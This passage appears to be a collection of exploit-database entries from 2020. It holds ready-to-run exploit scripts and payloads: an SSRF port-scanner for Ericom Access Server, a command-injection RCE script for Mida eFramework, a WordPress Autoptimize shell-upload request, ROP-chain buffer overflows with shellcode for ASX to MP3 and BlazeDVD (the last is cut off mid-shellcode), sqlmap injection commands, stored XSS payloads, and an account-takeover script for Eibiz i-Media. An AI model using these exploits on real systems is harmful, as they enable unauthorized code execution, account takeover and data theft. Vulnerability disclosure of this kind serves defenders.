"Cannot connect to" message if a port is in a closed state. [Attack Vectors] Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems. This is possible due to a server side request forgery vulnerability and using a remote TCP socket program. [Impact Information Disclosure] true [CVE Impact Other] Exfiltration of open ports [Exploit/POC] import sys,ssl import websocket ##pip install websocket-client #Required #By hyp3rlinx #ApparitionSec #======================================================== #Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF #======================================================== BANNER=""" ______ _____ | ____| / ____| | |__ _ __ _ __ ___ _ __| | ___ _ __ ___ | __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \ | |____| | | | | (_) | | | |___| (_) | | | | | | |______|_| |_| \___/|_| \_____\___/|_| |_| |_| SSRF Exploit """ def ErrorCom(vs,vp,t,p): try: ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE}) ws.send("SSRF4U!") result = ws.recv() #print(result) if result.find("Cannot connect to")==-1: print("[+] Port "+p+" is open for business :)") else: print("[!] Port " + p+ " is closed :(") ws.close() except Exception as e: print(str(e)) if __name__=="__main__": if len(sys.argv) != 5: print(BANNER) print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548") print("[+] By Hyp3rlinX / ApparitionSec") print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>") exit() if len(sys.argv[4]) > 5: print("[!] Port out of range") exit() print(BANNER) ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) [PoC Video URL] https://www.youtube.com/watch?v=oDTd-yRxVJ0 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification : June 21, 2020 Received automated reply : June 21, 2020 Request for status : June 30, 2020 Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020 Request for status : July 13, 2020 No vendor reponse Informed vendor advisory: August 11, 2020 Request for status : August 20, 2020 No vendor reponse August 22, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.9.0 # CVE : CVE-2020-15920 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920) [*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability (RCE) in PDC/ajaxreq.php Version\t< 2.9.0\t./CVE-2020-15920 http://192.168.1.60:8090/PDC/ajaxreq.php id Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php id """) def pwn(url,cmd): running = """ [*] Target URL: {0} [*] Command: {1} """ print(running.format(url,cmd)) data = { "DIAGNOSIS":"PING", "PARAM":"127.0.0.1 -c 0; {0}".format(cmd) } r = requests.post(url,data=data,verify=False) line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]" pretty_output = r.text.replace('<br>','\n') print(line+"\n{0}\n".format(pretty_output)+line) def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("cmd", type=str, help="the command you want to run") args = parser.parse_args() pwn(args.target, args.cmd) if __name__ == '__main__': main()

# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) # Date: 2020-08-24 # Software Link: https://wordpress.org/plugins/autoptimize/ # Author : SunCSR Team # Version: v2.7.6 # Tested on Ubuntu 18.04 / Kali Linux # Reference: https://wpvulndb.com/vulnerabilities/10372 Description : ------------------------------------------------------------------- The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. [POC] Step 1 : POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: pwnme User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26086940735210916964189813544 Content-Length: 685 Origin: http://pwnme Connection: close Cookie: autoptimize_feed=1; wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602; wp-settings-time-1=1598516614 -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/zip <?php Shell Content Here ! ?> -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="action" ao_ccss_import -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="ao_ccss_import_nonce" f25ca64f22 -----------------------------404272946439029073744006559647-- [Response] HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Thu, 27 Aug 2020 08:21:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Access-Control-Allow-Origin: http://pwnme.me Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 53 {"code":"200","msg":"Settings imported successfully"} Step 2: Access to http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php Recommendations: Update to version 2.7.7 Thank you very much!

# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) # Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true # Exploit Author: Paras Bhatia # Discovery Date: 2020-08-25 # Vulnerable Software: ASX to MP3 converter # Version: 3.1.3.7.2010.11.05 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept : # 1.- Run python code: asx_to_mp3_rop_exploit.py # 2.- Works on DEP enabled for ASX2MP3Converter.exe # 3.- Open "ASX2MP3Converter.exe" # 4.- Click on "Load" Button # 5.- Select generated file "asx_to_mp3_rop_exploit.wax". # 6.- Click on "Open". # 7.- Calc.exe runs. ################################################################################################################################################# #Python "asx_to_mp3_rop_exploit.py" Code: import struct file = 'asx_to_mp3_rop_exploit.wax' payload = "http://" payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC" ## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python buf = "" buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33" buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05" buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70" buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e" buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8" buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99" buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7" buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a" buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27" buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26" buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a" buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3" buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0" buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d" buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf" buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96" buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11112112) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEEEEE) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of esp in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN ##Save memory protection code (0x40) in ECX payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN payload += struct.pack('<L',0xffffffff) payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x10010C8A) # RETN ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()

# Title: Online Shopping Alphaware 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-28 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

# Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Date: 2020-08-28 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.getsymphony.com/ # Software Link: https://www.getsymphony.com/ # Version: 3.0.0 # Tested on: Windows # CVE : N/A Description: Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML To Reproduce: Steps to reproduce the behavior: 1. Login as member 2. Go to 'Articles' 3. Submit malicious content 4. Anyone (inclued admin) view article and XSS excuted Expected behavior When admin or user view content, a pop-up will be displayed Affected componets: events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading POC: POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://target/symphonycms/symphony/publish/articles/new/ Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932 Content-Length: 1111 Origin: http://target Connection: close Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd; Upgrade-Insecure-Requests: 1 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="xsrf" vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="MAX_FILE_SIZE" 5242880 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[title]" TEST XSS -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[body]" <script>alert('XSS')</script> -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[date]" 08/28/2020 5:55 am -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[categories][]" 2 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[publish]" yes -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="action[save]" Create Entry -----------------------------17679481844164416353626544932-- Desktop (please complete the following information): OS: Windows 10 Browser: Firefox or Chrome Application: XAMPP, Burpsuite Additional context Tested on: 9.03.50 verison POC at: https://vimeo.com/405740251

# Exploit Title: Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting # Date: 2020-08-07 # Vendor Homepage: https://www.nagios.com/products/nagios-log-server/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-log-server/change-log/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/stored-xss-vulnerability-nagios-log-server/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.1.6 and below # CVE : CVE-2020-16157 1. Description Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS. An attacker (in this case, an authenticated regular user) can use this vulnerability to execute malicious JavaScript aimed to steal cookies, redirect users, perform arbitrary actions on the victim’s (in this case, an admin’s) behalf, logging their keystroke and more. 2. Vulnerability The "Full Name" and "Username" fields in the /profile page or /admin/users/create page are vulnerable to Stored XSS. Once a payload is saved in one of these fields, navigate to the Alerting page (/alerts) and create a new alert and select Email Users as the Notification Method. As the user list is shown, it can be seen that the payload gets executed. 3. Timeline Vulnerability reported to the Nagios team – July 08, 2020 Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation # Date: 2020-08-28 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: 3.8.0 # Tested on: Windows # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develop advertising platform for out of home media in that # time the world called "Digital Signage". Because most business customers # still need get outside to get in touch which products and services. Online # media alone cannot serve them right place, right time. # # Desc: The application suffers from an unauthenticated remote privilege escalation # and account takeover vulnerability that can be triggered by directly calling the # updateUser object (part of ActionScript object graphs), effectively elevating to # an administrative role or taking over an existing account by modifying the settings. # # Tested on: Windows Server 2016 # Windows Server 2012 R2 # Windows Server 2008 R2 # Apache Flex # Apache Tomcat/6.0.14 # Apache-Coyote/1.1 # BlazeDS Application # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5584 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php # # # 26.07.2020 # # import requests import sys#####| import re##### | ############# | ############ | ########### | ########## | ######### | ######## | ####### | ###### | ##### | #PoC | ### | ## | # | class Escalada: def __init__(self): self.session = "11111111112222222222333333333344" self.agent = "DigitalSigner/25.1" self.display = "Intruder Alert" self.ep = "/messagebroker/amf" self.suprole = "Designer" self.serialize = None self.address = None self.usrname = None self.passwrd = None self.headers = None def usage(self): if len(sys.argv) < 5: print("i-Media Server Digital Signage 3.8.0 Privilege Escalation") print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]") print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator") exit(21) else: self.address = sys.argv[1] self.usrname = sys.argv[2] self.passwrd = sys.argv[3] self.display = sys.argv[4] self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5]) #__ # | Administrator __ # | Designer __ # | Reporter __ # | Approver if not "http" in self.address: self.address = "http://{}".format(self.address) def amf(self): self.cookies = {"JSESSIONID" : self.session} # not really needed self.headers = {"User-Agent" : self.agent, "Accept" : "*/*", "Accept-Language" : "en-US,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Origin" : self.address, "Connection" : "close", "Referer" : self.address + "/main.swf", "Content-Type" : "application/x-amf"} self.serialize = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C" self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00" self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65" self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74" self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74" self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49" self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09" self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49" self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F" self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65" self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75" self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31" self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45" self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41" self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04" self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D" self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61" self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74" self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61" self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75" self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62" self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15" self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72" self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61" self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06" #-" self.bytecount = len(self.passwrd * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------" self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33" self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32" self.serialize += b"\x2D\x31\x31\x31\x31\x06" #---------------------" self.bytecount = len(self.display * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.display.encode("utf-8"))) #-----------" self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53" self.serialize += b"\x74\x72\x65\x65\x74\x03\x06" #-----------------" self.bytecount = len(self.usrname * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------" self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74" self.serialize += b"\x79\x06" #-------------------------------------" self.bytecount = len(self.suprole * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------" self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62" self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75" self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00" self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41" self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D" self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35" self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44" self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D" self.serialize += b"\x79\x2D\x61\x6D\x66\x01" #---------------------" print("First try...") req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize) #print(req.text.encode("utf-8")) if "Detected duplicate HTTP-based FlexSessions" in req.text: print("Second try...") req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize) #print(req.text.encode("utf-8")) if "AcknowledgeMessage" in req.text: print("You are " + self.suprole + " now!") else: print("Didn't work.") exit(0) else: print("Try again!") def main(self): self.usage() self.amf() if __name__ == '__main__': Escalada().main()

# Title: Online Book Store 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-21 # Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html # Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases. #POC sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs

## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP) ## Author: emalp ## Date: 2020-08-31 ## Vendor Homepage: http://www.blazevideo.com/ ## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe ## Version: 7.0.0.0 ## Tested on: Windows 7 Home Basic # Run this file # bfile.plf will be generated # In blazeDVD open playlist and select bfile.plf # a pop up box will appear with text 'emalp' ## Change shellcode according to your needs ## Shellcode max size is aroung 700 bytes. # bad chars: # \x00, \x0a, \x0b, \x1a import struct bfile = open('bfile.plf','w') buf = 'A'*84 buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret buf += 'AAAA' # ret 04 ting from sehandler buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret buf += 'A'*500 buf += 'BBBB' # nseh buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04 #--------------------------------------------------------------------- # this way we have a lot more space for shellcode. buf += 'AAAA' # esp lands here. #setting up the dynamic pointer for virtual protect buf += struct.pack('<L', 0x61640e32) # pop eax; retn. buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32 buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax] # now eax has the kernel32.dll pointer buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04 buf += struct.pack('<L', 0x61640e32) # pop eax ret buf += 'XXXX' # ret 4 padding buf += struct.pack('<L', 0xffff675d) # neg to 98a3 buf += struct.pack('<L', 0x603267d4) # neg eax; ret # right now eax = 98a3; esi = [0012f95c] = k32.dll val buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret buf += 'XXXX' # pop esi padding buf += struct.pack('<L', 0x641045f4) # sub eax,ecx # now eax has the pointer to VirtualProtect #------------------------------------------------------------------------ # SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM # SETTING ESI buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4 # SETTING EBP buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret buf += 'XXXX' # prev ret 4 padding buf += struct.pack('<L', 0x60349b63) # jmp esp # SETTING EBX buf += struct.pack('<L', 0x61629938) # pop eax; ret buf += struct.pack('<L', 0xfffffdff) # neg to 0x201 buf += struct.pack('<L', 0x6033b16b) # neg eax; ret buf += struct.pack('<L', 0x61640124) # xchg eax,ebx # SETTING EDX buf += struct.pack('<L', 0x616310e8) # pop eax; ret buf += struct.pack('<L', 0xffffffc0) # neg of 0x40 buf += struct.pack('<L', 0x6033b16b) # neg eax; retn buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx # SETTING ECX buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret buf += struct.pack('<L', 0x1001524e) # writable location # SETTING EDI buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret buf += struct.pack('<L', 0x6162e802) # retn (rop nop) # SETTING EAX buf += struct.pack('<L', 0x6162d638) # pop eax; retn buf += struct.pack('<L', 0x90909090) # nop # FINALLY PUSHAD buf += struct.pack('<L', 0x6033cd4a) # push ad buf += '\x90\x90\x90\x90'*4 # shellcode generated using: # msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp" # -b '\x00\x0a\x0b\x1a' buf += ( "\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11" "\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd" "\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f" "\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d" "\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73" "\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43" 